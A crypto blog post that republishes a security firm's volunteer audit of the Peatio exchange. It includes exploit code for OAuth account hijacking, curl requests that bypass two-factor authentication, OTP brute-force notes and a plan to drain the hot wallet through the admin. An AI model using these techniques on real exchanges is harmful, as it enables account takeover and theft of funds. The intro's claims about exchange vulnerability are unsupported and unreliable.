• Crypto Lists
  • Bitcoin
  • Blockchain
  • Cryptocurrency
  • Altcoin
  • Advertise With Us
  • Join our Telegram Community
Newsletter
ItsBlockchain
  • Bitcoin
    Is the Russia-Ukraine War the Biggest Test for Bitcoin? Market Update

    Is the Russia-Ukraine War the Biggest Test for Bitcoin? Market Update

    Bitcoin ETFs could have the same result as CME group futures launch in 2017

    Bitcoin ETFs could have the same result as CME group futures launch in 2017

    featured image

    How Bitcoin can be hacked?

    keep bitcoin safe

    Keep Your Bitcoins Safe: All You Need to Know About Crypto-Cyberthreats

    featured image

    Bitcoin IRA – Everything You Need to Know

    A trillion dollar tsunami is about to hit Bitcoin

    A trillion dollar tsunami is about to hit Bitcoin

    featured image

    Why Bitcoin will always be the number one cryptocurrency? Explained

    Crypto markets mirror Wall Street’s fall- Loses 100 billion in 24 hours and Delta Plus Variant creates extreme fear

    Crypto markets mirror Wall Street’s fall- Loses 100 billion in 24 hours and Delta Plus Variant creates extreme fear

    On-chain shows Divergence against Bearish Price-Action, But Bitcoin continues to stay in the Re-Accumulation Phase

    On-chain shows Divergence against Bearish Price-Action, But Bitcoin continues to stay in the Re-Accumulation Phase

    Trending Tags

    • Crypto Gems
    • NFT
    • DEFI
    • Crypto Lists
    • Altcoin
    • Crypto Market
    • Guide
    • IBC Capital
    No Result
    View All Result
    • Bitcoin
      Is the Russia-Ukraine War the Biggest Test for Bitcoin? Market Update

      Is the Russia-Ukraine War the Biggest Test for Bitcoin? Market Update

      Bitcoin ETFs could have the same result as CME group futures launch in 2017

      Bitcoin ETFs could have the same result as CME group futures launch in 2017

      featured image

      How Bitcoin can be hacked?

      keep bitcoin safe

      Keep Your Bitcoins Safe: All You Need to Know About Crypto-Cyberthreats

      featured image

      Bitcoin IRA – Everything You Need to Know

      A trillion dollar tsunami is about to hit Bitcoin

      A trillion dollar tsunami is about to hit Bitcoin

      featured image

      Why Bitcoin will always be the number one cryptocurrency? Explained

      Crypto markets mirror Wall Street’s fall- Loses 100 billion in 24 hours and Delta Plus Variant creates extreme fear

      Crypto markets mirror Wall Street’s fall- Loses 100 billion in 24 hours and Delta Plus Variant creates extreme fear

      On-chain shows Divergence against Bearish Price-Action, But Bitcoin continues to stay in the Re-Accumulation Phase

      On-chain shows Divergence against Bearish Price-Action, But Bitcoin continues to stay in the Re-Accumulation Phase

      Trending Tags

      • Crypto Gems
      • NFT
      • DEFI
      • Crypto Lists
      • Altcoin
      • Crypto Market
      • Guide
      • IBC Capital
      No Result
      View All Result
      ItsBlockchain
      No Result
      View All Result
      Home bitcoin

      Beware ! Your Bitcoins can be stolen at any point of time

      Hitesh Malviya by Hitesh Malviya
      March 4, 2020
      in bitcoin, Cryptocurrency
      0 0
      0
      bitcoin hacking
      32
      SHARES
      397
      VIEWS
      Share on FacebookShare on Twitter

      There are 2630 cryptocurrency exchanges are available  & The list is increasing by each passing day. Which exchange to choose when it comes to store your crypto assets?  If you follow bitcoin space, you must have heard about Hacking attacks on Top Bitcoin echange Bitfinex last year.

      If the best exchange could went hacking, How sure we are about others. This is an eye opener post about security of these exchanges. 75% of exchanges are still vulnerable to cyber attack and Can be hacked at any point of time. You all must be waiting for bitcoin price to go down, Wait my friend, One such cyber attack and Bitcoin Price will fall drastically.

      I am going to present a case study done by SAKURITY on Bitcoin Hacking in this post.

      UPDATE: Once again – no one was hacked in reality and the audit was conducted for free. This post is simply an attack scenario. You can download the final report and see clarifications here.

      For a while we’ve been looking for a project to conduct volunteer security audit. Recently we found a perfect suit for us – an open source crypto currency exchange Peatio powered by Rails.

      We dedicated 8 hours to find a way to do the worst you can do with a Bitcoin exchange – steal the hot wallet. The mission was partially accomplished and we found an interesting chain of critical vulnerabilities.

      Step 1. Hijacking the account

      Peatio has “Connect Weibo account” feature built-in. According to OAuth Security Cheatsheet, poorly implemented OAuth is a reliable way to take over an account.

      Connecting attacker’s weibo account to the victim’s Peatio account

      omniauth-weibo-oauth2 gem was vulnerable to state fixation. We can set state to an arbitrary value (e.g. 123) and apply the attacker’s code instead along with state=123, which will lead to assigning attacker’s weibo to victim’s peatio account. The exact same issue was in omniauth-facebook gem and others omniauth-based libraries copy pasting same vulnerable code. It’s funny that the comment above says “to support omniauth-oauth2’s auto csrf protection” but does the opposite and switches it off.

      The bug can be exploited with following Sinatra app, just add YourWeiboCookies:

      require 'sinatra'
      get '/get_weibo_cb' do
      
        conn = Faraday.new(:url => 'https://api.weibo.com')
        new_url = conn.get do |r|
          r.url "/oauth2/authorize?client_id=456519107&redirect_uri=https%3A%2F%2Fyunbi.com%2Fauth%2Fweibo%2Fcallback&response_type=code&state=123"
      
          r.headers['Cookie'] =<<COOKIE
      YourWeiboCookies
      COOKIE
      
          r.options.timeout = 4        
          r.options.open_timeout = 2
        end.headers["Location"]
        redirect new_url
      end
      
      get '/peatio_demo' do
        response.headers['Content-Security-Policy'] = "img-src 'self' https://yunbi.com"
        "<img src='https://yunbi.com/auth/weibo?state=123'><img src='/get_weibo_cb'>"
      end
      What if the user already has Weibo connected?

      The system is not going to connect another Weibo account but we wanted the exploit to work seamlessly for every possible victim. So we hacked Weibo’s OAuth.

      First, we found out Weibo doesn’t whitelist redirect_uri like Github didn’t. It’s possible to change redirect_uri to another page on the victim domain to leak the code in the Referrer header and then use it to log in victim’s account.

      However there was no such page on Peatio to make it leak. No external images, links or anything. The attack surface was so tiny. But then we found this in DocumentsController:

      if not @doc
        redirect_to(request.referer || root_path)
        return
      end
      

      Following chain of redirects leaks the code by putting it in the # fragment first.

      1. attacker_page redirects to weibo.com/authorize?...redirect_uri=https://app/documents/not_existing_doc%23...
      2. Weibo doesn’t properly parse redirect_uri and redirects the victim to https://app/documents/not_existing_doc#?code=VALID_CODE
      3. Peatio cannot find not_existing_doc and sends back Location header equal request.referrer which is still attacker_page (the browser retains this header while gets redirected)
      4. The browser preserves #?code=VALID_CODE fragment and loads attacker_page#?code=VALID_CODE. Now the code can be leaked with JS via location.hash variable. The code can be used against https://app/auth/weibo/callback to log in the victim’s account.

      So using two bugs above we can hijack any peatio account and only last one requires JS.

      Step 2: Bypassing 2 Factor Authentication

      For users with Google Authenticator activated

      There’s a gaping hole in SmsAuthsController – two_factor_required! is only called for showaction, but not for update which is actually responsible for activating SMS 2FA.

      before_action :auth_member!
      before_action :find_sms_auth
      before_action :activated?
      before_action :two_factor_required!, only: [:show]
      
      def show
        @phone_number = Phonelib.parse(current_user.phone_number).national
      end
      
      def update
        if params[:commit] == 'send_code'
          send_code_phase
        else
          verify_code_phase
        end
      end
      

      We can activate new SMS authenticator simply sending following requests straight to updateaction.

      curl ‘https://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&commit=send_code’

      curl ‘https://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&sms_auth%5Botp%5D=CODE_WE_RECEIVED’

      For users with both Authenticator and SMS

      Peatio doesn’t store failed attempts for OTP so it’s very easy to bruteforce both App and SMS OTPs, it will take less than 3 days. For more details check our OTP Bruteforce Calculator

      For users with SMS 2FA only

      two_factor_by_type method doesn’t use activated scope so even inactive 2FA models can be used. Thus we are not going to brute SMS auth because the victim will start receiving suspicious SMS. We still can bruteforce Google Authenticator because it has seed generated and verify? method is working fine.

      def two_factor_by_type
        current_user.two_factors.by_type(params[:id])
      end
      
      Furthermore, SMS 2FA has two more issues
      def gen_code
        self.otp_secret = OTP_LENGTH.times.map{ Random.rand(9) + 1 }.join
        self.refreshed_at = Time.now
      end
      

      First issue is Random.rand is based on PRNG (Mersenne Twister) which is easily predictable once you have enough subsequently generated numbers.

      Second issue is rand(9) can only generate numbers from 0 to 8 so total number of combinations will be 9^6=531441 almost twice less than 1,000,000 and twice easier to bruteforce than App 2FA.

      With tricks outlined above we can bypass 2FA for any user. In worst case scenario it takes less than 3 days. If the victim has only Google Authenticator it takes less than 5 seconds to set up new SMS authenticator.

      Step 3: Attacking the admin

      Alright, we can hijack the account and bypass 2FA for any user, so we can steal the Bitcoins from anyone who visits our page. Still we need a lot of users to trick into clicking our phishy links. Let’s focus on just one of them – the admin.

      The simplest way to make the admin visit our link is to create a support ticket with something like “What is wrong with my account can you please check? https://i.will.hack.you/now”. Then we hack 2FA to get into the /admin panel:

      Unfortunately, this is the worst part. The admin of Peatio can do just few more things than a regular user. Nothing like “Send all the coins to this bad guy” or “Show API keys of all users”.

        can :update, Proof
        can :manage, Document
        can :manage, Member
        can :manage, Ticket
        can :manage, IdDocument
        can :manage, TwoFactor
        can :menu, Deposit
        can :manage, Deposit
        can :manage, ::Deposits::Bank
        can :manage, ::Deposits::Satoshi
        can :menu, Withdraw
        can :manage, ::Withdraws::Bank
        can :manage, ::Withdraws::Satoshi
      

      The only thing we found is creating a fiat deposit of like 99999999 Chinese Yuan and then accepting it by an admin.

      Then we can buy all available Bitcoins and altcoins to withdraw them. However not all Bitcoins are on orders. Doing it in stealth mode for a week can bring better results than closing all the orders in rush mode.

      Yunbi assets: 1636 BTC in total and ~350 in the hot wallet

      Our bounty: 1 BTC. It wasn’t about money though.

      Finally, the report is available to download.

      Hitesh Malviya

      Hitesh Malviya is the Founder of ItsBlockchain. He is one of the most early adopters of blockchain & cryptocurrency enthusiast in India. After being into space for a few years, he started IBC in 2016 to help other early adopters learn about the technology.
      Before IBC, Hitesh has founded 4 companies in the cyber security & IT space.

      IBC-Transparent-Logo-(1)

      Subscribe To Our Newsletter

      Join our mailing list to receive Cryptocurrency investing and trading recommendations to your mailbox.

      You have Successfully Subscribed!

      Tags: bitcoincryptocurrencyexchange
      Share13Tweet8Share3

      Subscribe to get notified on latest posts.

      Unsubscribe

      Related Posts

      RINO Enterprise Wallet launches free Community Edition

      RINO Enterprise Wallet launches free Community Edition

      by Hitesh Malviya
      January 14, 2023
      0

      RINO, an enterprise-focused Monero Wallet, has recently launched a free Community Edition that allows everyone to benefit from some of...

      Learn How to Find Undervalued Coins

      Learn How to Find Undervalued Coins

      by Aniketh Paul
      October 29, 2022
      0

      Let's Learn How to Find Undervalued Coins using an amazing fundamental research tool called token terminal. Many times people judge...

      Top 5 upcoming Token Airdrops (Step-by-Step Guides)

      Top 5 upcoming Token Airdrops (Step-by-Step Guides)

      by Aniketh Paul
      November 22, 2022
      0

      Token airdrop is the new trend in the market that is popping up in popularity after Aptos Token Airdrop Event....

      Top 10 Ways to Make Money in Crypto

      Top 10 Ways to Make Money in Crypto

      by Aniketh Paul
      October 19, 2022
      0

      Making money in every domain is challenging but in crypto, it’s totally different. There are many ways you can create...

      IOX Token Offers A High APY Per Day Through Staking Rewards And BNB Dividends

      IOX Token Offers A High APY Per Day Through Staking Rewards And BNB Dividends

      by Hitesh Malviya
      September 16, 2022
      0

      IOX is a new staking decentralized application (Dapp) that provides all users an excellent return on investment. Through IOX, users...

      Load More

      About Us

      We curate the best cryptocurrency projects with the intention of adding value for investors through the process of selecting, organizing, and looking after different projects available in the cryptocurrency market.

      • Trending
      • Comments
      • Latest
      featured image

      List of leading partners of Ripple, and How they use XRP?

      February 2, 2021
      Top 5 upcoming Token Airdrops (Step-by-Step Guides)

      Top 5 upcoming Token Airdrops (Step-by-Step Guides)

      November 22, 2022
      A Beginner’s Guide to the Cosmos Ecosystem

      A Beginner’s Guide to the Cosmos Ecosystem

      September 6, 2021
      featured image

      List of ChainLink Partnerships which skyrocketed the growth of LINK cryptocurrency

      February 2, 2021
      Lens Protocol: Everything You need to Know

      Lens Protocol: Everything You need to Know

      November 18, 2022
      Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

      Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

      May 27, 2021
      EIP-4844 Explained | The Biggest Ethereum Upgrade

      EIP-4844 Explained | The Biggest Ethereum Upgrade

      February 7, 2023
      EIP-4844 Explained | The Biggest Ethereum Upgrade

      EIP-4844 Explained | The Biggest Ethereum Upgrade

      February 7, 2023
      What Blockchain Can Learn From Barnes & Noble and the Jacksonville Jaguars

      What Blockchain Can Learn From Barnes & Noble and the Jacksonville Jaguars

      January 17, 2023
      RINO Enterprise Wallet launches free Community Edition

      RINO Enterprise Wallet launches free Community Edition

      January 14, 2023
      Top 5 DeFi Projects on Tezos

      Top 5 DeFi Projects on Tezos

      December 26, 2022
      Modular Blockchains: The Next Big Thing in Web3

      Modular Blockchains: The Next Big Thing in Web3

      December 12, 2022
      A Dummy’s Guide to Ethereum Rollups

      A Dummy’s Guide to Ethereum Rollups

      November 30, 2022
      Tezos Blockchain is Always Under the Radar but Continues to Excel

      Tezos Blockchain is Always Under the Radar but Continues to Excel

      November 22, 2022
      • Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

        Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

        29616 shares
        Share 11836 Tweet 7397
      • A Mysterious Bitcoin Whale who sold 3000 Bitcoins at 58K$, Bought back 3521 Bitcoins in the last three days

        9924 shares
        Share 3969 Tweet 2481
      • Top 10 Low market cap altcoins to invest in 2021

        7257 shares
        Share 2901 Tweet 1813
      • Top 10 NFT Crypto Projects You Should Know

        7256 shares
        Share 2619 Tweet 1637
      • List of leading partners of Ripple, and How they use XRP?

        5999 shares
        Share 2399 Tweet 1500
      ItsBlockchain

      We are India’s first and oldest Blockchain & Cryptocurrency publication platform started in 2016. We are a one-stop destination for technical analysis, cryptocurrency recommendations, and Blockchain technology resources.

      Buying Guides

      • Buy Bitcoins in India
      • Buy Bitcoins in China
      • Buy bitcoins in Russia
      • Buy Bitcoins in Japan
      • Buy Bitcoins in Turkey

      Important Links

      • Home
      • About US
      • Privacy Policy
      • Promote Your ICO
      • Submit post

      Follow Us

      Contact us

      support@itsblockchain.com

      © 2020 itsblockchain.com - Designed and maintained by Fanatic Coders

      No Result
      View All Result
      • Bitcoin
      • Crypto Gems
      • NFT
      • DEFI
      • Crypto Lists
      • Altcoin
      • Crypto Market
      • Guide
      • IBC Capital

      © 2020 itsblockchain.com - Designed and maintained by Fanatic Coders

      Login to your account below

      Forgotten Password?

      Fill the forms bellow to register

      All fields are required. Log In

      Retrieve your password

      Please enter your username or email address to reset your password.

      Log In
      This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.